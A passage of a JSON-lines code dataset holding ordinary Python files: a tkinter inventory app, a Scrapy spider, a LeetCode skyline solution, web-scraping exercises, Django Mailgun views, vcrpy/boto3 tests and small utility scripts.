nxt.pack(side=RIGHT)\r\n rfr.pack(side=RIGHT)\r\n\r\n\r\nclass PageInfoFrame(tk.Frame):\r\n '''Show the current page number'''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n self.parent = parent\r\n \r\n self.config(bg = '#BCCE98')\r\n \r\n FONT = 'helvetica 14'\r\n\r\n self.string = ''\r\n\r\n self.page = Label(self, font=FONT, bg = '#BCCE98')\r\n\r\n self.page.pack(side=LEFT)\r\n\r\n self.update()\r\n\r\n def update(self):\r\n\r\n pagenr = self.parent.start.get() // 10\r\n\r\n pagenr += 1\r\n\r\n pageend = self.parent.length // 10\r\n\r\n pageend += 1\r\n\r\n self.string = 'Page: {0} of {1}'.format(pagenr, pageend)\r\n\r\n self.page.config(text=self.string)\r\n\r\n \r\n\r\nclass FilterFrame(tk.Frame):\r\n ''' Used as labels for columns '''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\n self.config(bg = '#BCCE98')\r\n\r\n FONT = 'helvetica 14'\r\n\r\n name = Label(self, text='Item name', font=FONT, width=30, bg = '#BCCE98').pack(side=LEFT)\r\n\r\n cate = Label(self, text='Category', font=FONT, width=20, bg = '#BCCE98').pack(side=LEFT)\r\n\r\n quan = Label(self, text='Quantity', font=FONT, bg = '#BCCE98').pack(side=LEFT)\r\n \r\n #opts = Button(self, font='helvetica 11 bold', width=60).pack(side=RIGHT, fill='y')\r\n\r\nclass ListFrame(tk.Frame):\r\n ''' View all the Listings '''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\n self.config(bg='#BCCE98')\r\n\r\n self.listing = list()\r\n\r\n FONT = \"Helvetica 14 bold\"\r\n\r\n \r\n self.start = IntVar()\r\n self.end = IntVar()\r\n\r\n self.start.set(0)\r\n self.end.set(10)\r\n\r\n\r\n self.navVar = 1\r\n\r\n self.entryBool = False\r\n \r\n \r\n self.filter = ''\r\n\r\n\r\n self.length = 0\r\n\r\n\r\n\r\n self.parent.bind(\"\", self.default)\r\n self.parent.bind(\"\", self.default)\r\n\r\n self.parent.bind(\"\", self._destroy)\r\n\r\n\r\n self.createEntryButton()\r\n #self.entryButton = Button(self, text='New Entry', command=self.entry, height=4, font=FONT)\r\n #self.entryButton.pack(fill='x',padx=10, pady=10)\r\n \r\n\r\n \r\n self.searchphrase = StringVar()\r\n\r\n\r\n \r\n\r\n self.searchBar = SearchFrame(self, var=self.searchphrase)\r\n\r\n self.searchBar.pack(fill='x')\r\n\r\n \r\n\r\n self.navFrame = NavFrame(self)\r\n\r\n self.navFrame.pack(pady=5)\r\n\r\n\r\n\r\n self.pageInfo = PageInfoFrame(self)\r\n\r\n self.pageInfo.pack()\r\n \r\n\r\n\r\n self.filterFrame = FilterFrame(self)\r\n\r\n self.filterFrame.pack(fill='x')\r\n\r\n\r\n\r\n\r\n self.parent.bind(\"\", self.sortName)\r\n\r\n self.parent.bind(\"\", self.sortCat)\r\n\r\n self.parent.bind(\"\", self.sortQty)\r\n\r\n self.parent.bind(\"\", self.reset)\r\n \r\n self.parent.bind(\"\", self.firstpage)\r\n\r\n self.parent.bind(\"\", self.prevpage)\r\n\r\n self.parent.bind(\"\", self.nextpage)\r\n\r\n self.parent.bind(\"\", self.lastpage)\r\n\r\n self.parent.bind(\"\", self.update)\r\n\r\n self.searchBar.entry.focus()\r\n\r\n \r\n #upd = Button(self, text='update', command=self.update)\r\n #upd.pack()\r\n\r\n '''\r\n\r\n nxt = Button(self, text='>', command=self.nextpage, height=2, width=20, font=FONT)\r\n \r\n\r\n prv = Button(self, text='<', command=self.prevpage, height=2, width=20, font=FONT)\r\n \r\n \r\n fst = Button(self, text='<<', command=self.firstpage, height=2, width=20, font=FONT)\r\n \r\n \r\n lst = Button(self, text='>>', command=self.lastpage, height=2, width=20, font=FONT)\r\n \r\n\r\n fst.pack(anchor=NW)\r\n prv.pack(anchor=NW)\r\n nxt.pack(anchor=NE)\r\n lst.pack(anchor=NE)\r\n\r\n '''\r\n \r\n\r\n\r\n \r\n self.update()\r\n def update(self, event=None):\r\n # obs!!!\r\n\r\n\r\n \r\n listing_data = utils.load() # manipulate list to contain filtered results\r\n\r\n\r\n\r\n search = self.searchphrase.get()\r\n\r\n if search:\r\n results = utils.search(search, listing_data)\r\n listing_data = results\r\n self.start.set(0)\r\n self.end.set(10)\r\n\r\n self.length = len(listing_data)\r\n \r\n self.pageInfo.update()\r\n\r\n s = self.start.get()\r\n e = self.end.get()\r\n\r\n\r\n if self.filter:\r\n if self.filter == 'dispname':\r\n listing_data = sorted(listing_data, key=lambda item: item['dispname'])\r\n elif self.filter == 'category':\r\n listing_data = sorted(listing_data, key=lambda item: item['category'])\r\n elif self.filter == 'quantity':\r\n listing_data = sorted(listing_data, key=lambda item: item['quantity'], reverse=True)\r\n \r\n \r\n\r\n [item.destroy() for item in self.listing]\r\n\r\n self.listing = [Listing(self, item, item['dispname'])\r\n for item in listing_data[s:e]]\r\n \r\n\r\n \r\n [item.pack(expand=True, fill='both') for item in self.listing]\r\n\r\n self.filter = ''\r\n\r\n\r\n def nextpage(self, event=None):\r\n \r\n s = self.start.get()\r\n e = self.end.get()\r\n\r\n if e > self.length:\r\n return\r\n\r\n self.start.set(s + 10)\r\n self.end.set(e + 10)\r\n\r\n self.update()\r\n \r\n def prevpage(self, event=None):\r\n\r\n s = self.start.get()\r\n e = self.end.get()\r\n\r\n if not s:\r\n return\r\n\r\n self.start.set(s - 10)\r\n self.end.set(e - 10)\r\n \r\n self.update()\r\n\r\n def firstpage(self, event=None):\r\n \r\n self.start.set(0)\r\n self.end.set(10)\r\n \r\n self.update()\r\n \r\n \r\n def lastpage(self, event=None):\r\n length = len(utils.load())\r\n\r\n if not length % 10:\r\n e = length\r\n s = e - 10\r\n\r\n else:\r\n \r\n intdiv = length // 10\r\n\r\n s = intdiv * 10\r\n e = s + 10\r\n \r\n self.start.set(s)\r\n self.end.set(e)\r\n \r\n self.update()\r\n\r\n def focus(self, event):\r\n\r\n self.searchBar.entry.focus()\r\n\r\n\r\n def createEntryButton(self):\r\n\r\n FONT = \"Helvetica 14 bold\"\r\n self.entryButton = Button(self, text='New Entry', command=self.entry, height=4, font=FONT, bg='#647939')\r\n self.entryButton.pack(fill='x',padx=10, pady=10)\r\n\r\n\r\n\r\n\r\n def entry(self):\r\n\r\n self.entryBool = True\r\n\r\n \r\n self.parent.bind(\"\", self.handleUpDown)\r\n self.parent.bind(\"\", self.handleUpDown)\r\n \r\n \r\n self.entryButton.destroy()\r\n \r\n self.entryFrame = EntryFrame(self)\r\n self.entryFrame.pack(fill='x', anchor='n', pady=10)\r\n self.entryFrame.nameEntry.focus()\r\n\r\n\r\n self.destAll()\r\n self.packAll()\r\n\r\n \r\n self.update()\r\n self.parent.bind(\"\", self.breakEntry)\r\n\r\n def breakEntry(self, event):\r\n\r\n self.entryBool = False\r\n\r\n \r\n self.parent.bind(\"\", self.default)\r\n self.parent.bind(\"\", self.default)\r\n \r\n self.parent.bind(\"\", self.update)\r\n\r\n\r\n nme = self.entryFrame.nameVar.get()\r\n qty = self.entryFrame.qtyVar.get()\r\n cat = self.entryFrame.catVar.get()\r\n\r\n if nme and cat:\r\n if utils.findExist(nme, cat):\r\n \r\n data = utils.load()\r\n\r\n try:\r\n qty = int(qty)\r\n if qty:\r\n for item in data:\r\n if item['dispname']==nme and item['category']==cat:\r\n item['quantity'] += qty\r\n except:\r\n for item in data:\r\n if item['dispname']==nme and item['category']==cat:\r\n item['quantity'] += 1\r\n utils.dump(data)\r\n else:\r\n\r\n try:\r\n qty = int(qty)\r\n if qty:\r\n entry = utils.entry(dispname=nme,\r\n quantity=qty,\r\n category=cat)\r\n except:\r\n entry = utils.entry(dispname=nme,\r\n category=cat)\r\n \r\n \r\n data = utils.load()\r\n data.append(entry)\r\n utils.dump(data)\r\n\r\n\r\n self.entryFrame.destroy()\r\n\r\n self.destAll()\r\n\r\n self.createEntryButton()\r\n\r\n self.packAll()\r\n \r\n self.parent.bind(\"\", self.update)\r\n\r\n self.searchBar.entry.focus()\r\n\r\n self.update()\r\n \r\n\r\n \r\n \r\n \r\n\r\n def handleUpDown(self, event):\r\n code = event.keycode\r\n\r\n if code == 38:\r\n if self.navVar == 1:\r\n return\r\n self.navVar -= 1\r\n else:\r\n if self.navVar == 3:\r\n return\r\n self.navVar += 1\r\n print(self.navVar)\r\n\r\n n = self.navVar\r\n\r\n if n == 1:\r\n self.entryFrame.nameEntry.focus()\r\n if n == 2:\r\n self.entryFrame.qtyEntry.focus()\r\n if n == 3:\r\n self.entryFrame.catEntry.focus()\r\n\r\n def destAll(self):\r\n \r\n self.searchBar.destroy()\r\n self.navFrame.destroy()\r\n self.pageInfo.destroy()\r\n self.filterFrame.destroy()\r\n\r\n def packAll(self):\r\n\r\n\r\n self.searchBar = SearchFrame(self, var=self.searchphrase)\r\n\r\n self.searchBar.pack(fill='x')\r\n\r\n \r\n\r\n self.navFrame = NavFrame(self)\r\n\r\n self.navFrame.pack(pady=5)\r\n\r\n\r\n \r\n self.pageInfo = PageInfoFrame(self)\r\n\r\n self.pageInfo.pack()\r\n\r\n\r\n\r\n self.filterFrame = FilterFrame(self)\r\n\r\n self.filterFrame.pack(fill='x')\r\n\r\n\r\n \r\n\r\n\r\n def default(self, event):\r\n pass\r\n\r\n def _destroy(self, event):\r\n self.parent.destroy()\r\n\r\n def sortName(self, event):\r\n self.filter = 'dispname'\r\n self.update()\r\n\r\n \r\n def sortCat(self, event):\r\n self.filter = 'category'\r\n self.update()\r\n\r\n \r\n def sortQty(self, event):\r\n self.filter = 'quantity'\r\n self.update()\r\n\r\n def reset(self, event):\r\n self.searchphrase.set('')\r\n self.update()\r\n\r\n \r\n\r\n \r\n\r\n \r\nclass Listing(tk.Frame):\r\n # obs!!!!\r\n ''' One line of listing '''\r\n def __init__(self, parent, data, dispname):\r\n tk.Frame.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\n self.data = data\r\n\r\n self.dispname = dispname\r\n\r\n self.config(bg='#f4f6ee', bd=1, relief=GROOVE)\r\n\r\n\r\n FONT = \"Helvetica 14\"\r\n\r\n\r\n \r\n \r\n nameLabel = Label(self, text=data['dispname'], font=FONT, bg='#f4f6ee')\r\n catLabel = Label(self, text=data['category'], font=FONT, bg='#f4f6ee')\r\n qtyLabel = Label(self, text=data['quantity'], font=FONT, bg='#f4f6ee')\r\n removeButton = Button(self, text='Remove', command=self.remove, fg='red', font='Helvetica 11 bold', bg='#f9f9f9')\r\n remOneButton = Button(self, text='-1', command=self.remOne, fg='red', font='Helvetica 11 bold', bg='#f9f9f9')\r\n addTenButton = Button(self, text='+10', command=self.addTen, fg='green', font='Helvetica 11 bold', bg='#f9f9f9')\r\n addFiveButton = Button(self, text='+5', command=self.addFive, fg='green', font='Helvetica 11 bold', bg='#f9f9f9')\r\n addOneButton = Button(self, text='+1', command=self.addOne, fg='green', font='Helvetica 11 bold', bg='#f9f9f9')\r\n \r\n\r\n nameLabel.pack(side=LEFT)\r\n catLabel.pack(side=LEFT)\r\n qtyLabel.pack(side=LEFT)\r\n removeButton.pack(side=RIGHT)\r\n remOneButton.pack(side=RIGHT)\r\n addTenButton.pack(side=RIGHT)\r\n addFiveButton.pack(side=RIGHT)\r\n addOneButton.pack(side=RIGHT)\r\n \r\n\r\n \r\n removeButton.configure(height=2, width=20)\r\n remOneButton.configure(height=2, width=10)\r\n addTenButton.configure(height=2, width=10)\r\n addFiveButton.configure(height=2, width=10)\r\n addOneButton.configure(height=2, width=10)\r\n nameLabel.configure(width=30)\r\n catLabel.configure(width=20)\r\n qtyLabel.configure(width=4)\r\n\r\n def addOne(self):\r\n '''\r\n listing_data = utils.load()\r\n listing_data[self.row]['quantity'] += 1\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n '''\r\n listing_data = utils.load()\r\n for i in listing_data:\r\n if i == self.data:\r\n i['quantity'] += 1\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n \r\n def addTen(self):\r\n '''\r\n listing_data = utils.load()\r\n listing_data[self.row]['quantity'] += 10\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n '''\r\n listing_data = utils.load()\r\n for i in listing_data:\r\n if i == self.data:\r\n i['quantity'] += 10\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n \r\n def addFive(self):\r\n '''\r\n listing_data = utils.load()\r\n listing_data[self.row]['quantity'] += 5\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n '''\r\n listing_data = utils.load()\r\n for i in listing_data:\r\n if i == self.data:\r\n i['quantity'] += 5\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n \r\n def remOne(self):\r\n listing_data = utils.load()\r\n temp_data = listing_data[:]\r\n for i in listing_data:\r\n if i == self.data:\r\n if i['quantity'] == 0:\r\n return\r\n else:\r\n i['quantity'] -= 1\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n return\r\n \r\n\r\n \r\n def remove(self):\r\n listing_data = utils.load()\r\n temp_data = listing_data[:]\r\n for i in listing_data:\r\n if i == self.data:\r\n temp_data = [item for item in temp_data if not item == self.data]\r\n utils.dump(temp_data)\r\n self.parent.update()\r\n return\r\n \r\n \r\n \r\n\r\n### Buttons ###\r\nclass AddOneBut(tk.Button):\r\n ''' Button to add one item'''\r\n def __init__(self, parent):\r\n tk.Button.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\nclass SubOneBut(tk.Button):\r\n ''' Button to subtract one item'''\r\n def __init__(self, parent):\r\n tk.Button.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\nclass RemoveBut(tk.Button):\r\n ''' Button to remove item'''\r\n def __init__(self, parent):\r\n tk.Button.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\n\r\n\r\n\r\n### Special ###\r\n\r\n\r\n\r\n\r\ndef main():\r\n ''' For testing / development purposes '''\r\n\r\n\r\n root = Tk()\r\n\r\n\r\n fr = ListFrame(root)\r\n \r\n \r\n fr.pack(expand=True, fill='x', pady=10, padx=10, anchor=N)\r\n\r\n root.overrideredirect(True) #remove comment (#) when in production\r\n\r\n root.geometry(\"{0}x{1}\".format(root.winfo_screenwidth(), root.winfo_screenheight()))\r\n\r\n root.configure(background='#BCCE98')\r\n\r\n root.mainloop()\r\n\r\n\r\n\r\n\r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"swamp.pyw","file_name":"swamp.pyw","file_ext":"pyw","file_size_in_byte":18792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"476704795","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors import LinkExtractor\nfrom qb.items import qb_item\n#from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\n#import logging\n\n\n\nclass qb_spider(CrawlSpider):\n name = 'qb'\n allowed_domains = ['qiushibaike.com']\n start_urls = ['http://www.qiushibaike.com']\n download_delay = 1\n rules = [\n Rule(LinkExtractor(allow=('/8hr/page/'), restrict_xpaths=('//span[@class=\"next\"]/..')),callback='parse_item',follow=True)\n ]\n\n def parse_item(self, response):\n\n sel = response.xpath('//div[@class=\"article block untagged mb15\"]/div[@class=\"content\"]')\n for line in sel:\n item = qb_item()\n item['content'] = line.xpath('text()').extract()\n yield item\n\n\n\n\n\n","sub_path":"qb/qb/spiders/qb_spider.py","file_name":"qb_spider.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"9635734","text":"from heapq import _heapify_max, _heappop_max\nclass Solution(object):\n def getSkyline(self, buildings):\n \"\"\"\n :type buildings: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n start_end_array = []\n array_data_dict = {}\n for building in buildings:\n if building[0] not in array_data_dict:\n array_data_dict[building[0]] = {\n 's': [building[2]],\n 'e': []\n }\n else:\n array_data_dict[building[0]]['s'].append(building[2])\n if building[1] not in array_data_dict:\n array_data_dict[building[1]] = {\n 'e': [building[2]],\n 's': []\n }\n else:\n array_data_dict[building[1]]['e'].append(building[2])\n\n array_x_sorted = sorted(array_data_dict.keys())\n for x in array_x_sorted:\n same_x = array_data_dict[x]\n same_x_start = same_x.get('s')\n same_x_end = same_x.get('e')\n if same_x_start:\n same_x_start = sorted(same_x_start, reverse=True)\n for s_i in same_x_start:\n start_end_array.append((x, s_i, True))\n if same_x_end:\n same_x_end = sorted(same_x_end)\n for e_i in same_x_end:\n start_end_array.append((x, e_i, False))\n\n priority_que_dict = {0 : 1}\n ans = []\n # priority_que = _heapify_max([])\n\n max_height = -1\n for corrd in start_end_array:\n\n if corrd[2]:\n if corrd[1] in priority_que_dict:\n priority_que_dict[corrd[1]] += 1\n else:\n priority_que_dict[corrd[1]] = 1\n # priority_que = heappop(list(priority_que_dict.keys()))\n\n test = list(priority_que_dict.keys())\n _heapify_max(test)\n\n\n else:\n priority_que_dict[corrd[1]] -= 1\n if priority_que_dict[corrd[1]] == 0:\n del priority_que_dict[corrd[1]]\n # priority_que = list(priority_que_dict.keys())\n # _heappop_max(test)\n test = list(priority_que_dict.keys())\n _heapify_max(test)\n\n\n\n height = test[0]\n if max_height != height:\n max_height = height\n ans.append([corrd[0], height])\n return ans\n\nsol = Solution()\nprint(sol.getSkyline([[2,9,10],[3,7,15],[5,12,12],[15,20,10],[19,24,8]]))","sub_path":"python/218. skyline.py","file_name":"218. skyline.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"29275638","text":"import urllib.request as UR\nfrom bs4 import BeautifulSoup\n\nurl = \"http://pr4e.dr-chuck.com/tsugi/mod/python-data/data/known_by_Fikret.html\"\ncount = 4\npos = 3\ntaglist = list()\nurllist = list()\nurllist.append(url)\n\nprint('Retrieving: ', urllist[0])\n\nfor i in range(count):\n html = UR.urlopen(urllist[-1]).read()\n #print(html)\n #print(urllist[-1])\n soup = BeautifulSoup(html,'lxml')\n print(soup)\n tags = soup.find_all('a')\n #print('Tags:',tags)\n\n# for tag in tags:\n# #taglist = list()\n# #taglist.append(tag)\n# url = tag.get('href',None)\n# print('Retrieving:',url)\n# #urllist.append(url)\n# #url = taglist[pos].get('href', None)\n# \t #print('Retrieving: ', url)\n# # urllist.append(url)\n# # \n# # print('Last Url: ', urllist[-1])","sub_path":"soup3.py","file_name":"soup3.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"236976041","text":"from django.shortcuts import render\nfrom django.db import transaction\nfrom .mailgun_helper import *\nfrom . import models\nimport email\nimport re\nimport django.contrib.auth as auth\nfrom django.contrib.auth.decorators import login_required\n\n#Downloads all messages from Mailgun and returns success or failure.\n@transaction.atomic\ndef get_all_mailgun_messages(request):\n result =mget(\"events\").json()\n events=result['items']\n message_urls=[i['storage']['url'] for i in events if i['event']=='stored']\n messages_request = [mget(i, prepend=False) for i in message_urls]\n messages_dict=[i.json() for i in messages_request]\n messages_json=[i.text for i in messages_request]\n count = 0\n #For each message, we make an e-mail model and save it.\n for i, json_raw in zip(messages_dict, messages_json):\n #We first extract the message id, which is supposed to be unique for all e-mails everywhere.\n headers=i['message-headers']\n #Nothing actually stops someone sending a message with multiple headers of the same type.\n ids=[j[1] for j in headers if j[0] == 'Message-Id']\n id=ids[0]\n #This ID may already be in the database. If it is, we bail out now.\n exists=models.Email.objects.filter(message_id= id).count()\n if exists >0:\n continue\n #The other pieces of important information we need out of the e-mail is the In-Reply-To header and the references header.\n #Together, these form a list of ids which we use to build threads, later.\n in_reply_to =[j[1] for j in headers if j[0]== 'In-Reply-To']\n references=[j[1] for j in headers if j[0]=='References']\n #The in_reply_to field is one id only so we start with that.\n in_thread = list(in_reply_to)\n for j in references:\n in_thread +=re.findall(r\"<[^<]+>\", j)\n in_thread= set(in_thread) #remove duplicates.\n #We now have enough info to build the message itself as follows.\n new_message=models.Email(\n was_sent=False,\n mailgun_json = json_raw,\n message_id=id,\n subject=i['subject'],\n from_address=i['from'],\n )\n #Build up a ist of all the e-mail addresses involved in this e-mail.\n all_addresses = i['from']+\",\"+i['To']\n new_message.all_addresses= all_addresses\n new_message.save()\n #Next, build the thread by pointing all messages at the latest.\n for j in models.Email.objects.filter(message_id__in = list(in_thread)):\n j.latest = new_message\n j.save()\n #Finally, handle users.\n user_emails= [j.strip() for j in i['recipients'].split(\",\")]\n users=list(models.UserProfile.objects.filter(email__in = user_emails))\n new_message.for_users = users\n new_message.save()\n for u in users:\n u.save()\n count +=1\n return render(request, 'simplemail/mailgun_got_messages.html', {'count': count})\n\n@login_required\ndef inbox(request):\n messages= request.user.userprofile.owned_emails.all().order_by('-date')\n return render(request, \"simplemail/inbox.html\", {'messages': messages})\n\n@login_required\ndef view_message(request, message_id):\n pass\n","sub_path":"cen4010/simplemail/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"106407386","text":"import pytest\nimport os\n\nboto3 = pytest.importorskip(\"boto3\")\n\nimport boto3 # NOQA\nimport botocore # NOQA\nimport vcr # NOQA\n\nses = boto3.Session(\n aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],\n aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],\n aws_session_token=None,\n region_name=os.environ['AWS_DEFAULT_REGION'],\n # botocore_session=None,\n # profile_name=None\n)\n\nIAM_CLIENT = ses.client('iam')\n\ntry:\n from botocore import awsrequest # NOQA\n\n botocore_awsrequest = True\nexcept ImportError:\n botocore_awsrequest = False\n\n\n# skip tests if boto does not use vendored requests anymore\n# https://github.com/boto/botocore/pull/1495\nboto3_skip_vendored_requests = pytest.mark.skipif(\n botocore_awsrequest,\n reason='botocore version {ver} does not use vendored requests anymore.'.format(\n ver=botocore.__version__))\n\nboto3_skip_awsrequest = pytest.mark.skipif(\n not botocore_awsrequest,\n reason='botocore version {ver} still uses vendored requests.'.format(\n ver=botocore.__version__))\n\n\n@boto3_skip_vendored_requests\ndef test_boto_vendored_stubs(tmpdir):\n with vcr.use_cassette(str(tmpdir.join('boto3-stubs.yml'))):\n # Perform the imports within the patched context so that\n # HTTPConnection, VerifiedHTTPSConnection refers to the patched version.\n from botocore.vendored.requests.packages.urllib3.connectionpool import \\\n HTTPConnection, VerifiedHTTPSConnection\n from vcr.stubs.boto3_stubs import VCRRequestsHTTPConnection, VCRRequestsHTTPSConnection\n # Prove that the class was patched by the stub and that we can instantiate it.\n assert issubclass(HTTPConnection, VCRRequestsHTTPConnection)\n assert issubclass(VerifiedHTTPSConnection, VCRRequestsHTTPSConnection)\n HTTPConnection('hostname.does.not.matter')\n VerifiedHTTPSConnection('hostname.does.not.matter')\n\n\n@boto3_skip_awsrequest\ndef test_boto3_awsrequest_stubs(tmpdir):\n with vcr.use_cassette(str(tmpdir.join('boto3-stubs.yml'))):\n from botocore.awsrequest import AWSHTTPConnection, AWSHTTPSConnection\n from vcr.stubs.boto3_stubs import VCRRequestsHTTPConnection, VCRRequestsHTTPSConnection\n assert issubclass(VCRRequestsHTTPConnection, AWSHTTPConnection)\n assert issubclass(VCRRequestsHTTPSConnection, AWSHTTPSConnection)\n AWSHTTPConnection('hostname.does.not.matter')\n AWSHTTPSConnection('hostname.does.not.matter')\n\n\ndef test_boto3_without_vcr():\n username = 'user'\n response = IAM_CLIENT.get_user(UserName=username)\n\n assert response['User']['UserName'] == username\n\n\ndef test_boto_medium_difficulty(tmpdir):\n username = 'user'\n\n with vcr.use_cassette(str(tmpdir.join('boto3-medium.yml'))):\n response = IAM_CLIENT.get_user(UserName=username)\n assert response['User']['UserName'] == username\n\n with vcr.use_cassette(str(tmpdir.join('boto3-medium.yml'))) as cass:\n response = IAM_CLIENT.get_user(UserName=username)\n assert response['User']['UserName'] == username\n assert cass.all_played\n\n\ndef test_boto_hardcore_mode(tmpdir):\n username = 'user'\n with vcr.use_cassette(str(tmpdir.join('boto3-hardcore.yml'))):\n ses = boto3.Session(\n aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],\n aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],\n region_name=os.environ['AWS_DEFAULT_REGION'],\n )\n\n iam_client = ses.client('iam')\n response = iam_client.get_user(UserName=username)\n assert response['User']['UserName'] == username\n\n with vcr.use_cassette(str(tmpdir.join('boto3-hardcore.yml'))) as cass:\n ses = boto3.Session(\n aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],\n aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],\n aws_session_token=None,\n region_name=os.environ['AWS_DEFAULT_REGION'],\n )\n\n iam_client = ses.client('iam')\n response = iam_client.get_user(UserName=username)\n assert response['User']['UserName'] == username\n assert cass.all_played\n","sub_path":"tests/integration/test_boto3.py","file_name":"test_boto3.py","file_ext":"py","file_size_in_byte":4131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358534067","text":"print(\"Suma y promedio de n numeros\")\n\nn=int(input(\"Digita un numero: \"))\n\ntotal_n=n\nsuma=0\n\nwhile n>=0:\n\tsuma+=1\n\tn-=1\n\nprint(\"La suma es \" + str(suma))\nprom=suma/total_n\nprint(\"El promedio es \" + str(prom))\nprint(\"Final del programa\")\n\n\t","sub_path":"N_64.py","file_name":"N_64.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"612999021","text":"import string\n\ndef cleanword(word):\n \"\"\"\n >>> cleanword('what?')\n 'what'\n >>> cleanword('\"now!\"')\n 'now'\n >>> cleanword('?+=\"word!,@$()\"')\n 'word'\n \"\"\"\n\n \n return word.strip('@$#,()!?+=\"')\n\n\ndef extract_words(s):\n \"\"\"\n >>> extract_words('Now is the time! \"Now\", is the time? Yes, now.')\n ['now', 'is', 'the', 'time', 'now', 'is', 'the', 'time', 'yes', 'now']\n >>> extract_words('she tried to curtsey as she spoke--fancy')\n ['she', 'tried', 'to', 'curtsey', 'as', 'she', 'spoke', 'fancy']\n \"\"\"\n\n str = s\n str = ''.join([ c for c in str if c not in ('@', '.', ',', \"'\", '\"', '!', '?', '&')])\n str = str.lower()\n # str = str[6].split('--')\n str = str.split(' ')\n# str = str.split('')\n return str\n\n \nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"wordtools.py","file_name":"wordtools.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"101444139","text":"#! python3\r\n# dmm.py - Download Meeting Media\r\n# Downloads all meeting media from jw.org\r\n\r\n# imports\r\nimport requests, bs4, webbrowser, pprint, os\r\n\r\n# Dummy dictionary for testing\r\ninfo = {'month': 'enero', 'year': '2019', 'dates': '7-13', 'path':\r\n 'C:\\\\Users\\\\Mack W\\\\Documents\\\\Python\\\\personalProjects\\\\Meeting Media Downloader'}\r\n\r\n# month, year, dates (Example: 7-13)\r\ndef inputs():\r\n info = {'month': '', 'year': '', 'dates': '', 'path': ''}\r\n keys = list(info.keys())\r\n for i in range(len(keys)):\r\n print('%s: ' % keys[i], end='')\r\n info[keys[i]] = input()\r\n return info \r\n\r\n# save workbook html\r\ndef guia(info):\r\n # all spanish workbooks start with this url\r\n base = 'https://www.jw.org/es/publicaciones/guia-actividades-reunion-testigos-jehova'\r\n # craft url using user input data\r\n month = info['month']\r\n year = info['year']\r\n dates = info['dates'] \r\n ext = '/%s-%s-mwb/programa-reunion-%sen/' % (month, year, dates)\r\n # download the url\r\n url = base + ext\r\n res = requests.get(url)\r\n res.raise_for_status()\r\n # workbook name\r\n workbook = ('%s %s workbook.txt' % (month, dates))\r\n # save to file\r\n file = open(workbook, 'wb')\r\n for chunk in res.iter_content(100000):\r\n file.write(chunk)\r\n file.close()\r\n\r\n# return urls of the meeting parts\r\ndef mediaUrls(info):\r\n month = info['month']\r\n dates = info['dates']\r\n \r\n # make soup object to parse the html\r\n file = open(('%s %s workbook.txt' % (month, dates)), 'rb')\r\n meetingSoup = bs4.BeautifulSoup(file, features=\"lxml\")\r\n \r\n # find elements (where the magic happens)\r\n elems = []\r\n elems += meetingSoup.select('a[class=\"pubSym-nwtsv\"]') # introduction to bible books videos\r\n elems += meetingSoup.select('a[class=\"pubSym-mwb19\"]') # tesoros y nuestra vida cristiana\r\n elems += meetingSoup.select('a[data-video]') # videos when it says 'el video'\r\n elems += meetingSoup.select('a[class=\"pubSym-thv\"]') # seamos mejores maestros\r\n elems += meetingSoup.select('a[class=\"pubSym-jy\"]') # Jesus-The Way jy book\r\n \r\n # find links\r\n urls = [] \r\n base = 'https://www.jw.org'\r\n for i in range(len(elems)):\r\n ext = elems[i].get('href')\r\n if ext.startswith('/'):\r\n url = base + ext\r\n else:\r\n url = ext\r\n urls.append(url)\r\n return urls\r\n\r\ndef web2text(urls):\r\n names = []\r\n # download and name media files\r\n for i in range(len(urls)):\r\n res = requests.get(urls[i])\r\n res.raise_for_status()\r\n soup = bs4.BeautifulSoup(res.text, features=\"lxml\")\r\n elem = soup.select('h1')\r\n if elem:\r\n name = elem[0].getText() + '.txt'\r\n names.append(name)\r\n file = open(name, 'wb')\r\n for chunk in res.iter_content(100000):\r\n file.write(chunk)\r\n file.close()\r\n return names\r\n\r\n# Main\r\n# info = inputs()\r\nos.chdir(info['path'])\r\n# guia(info)\r\nurls = 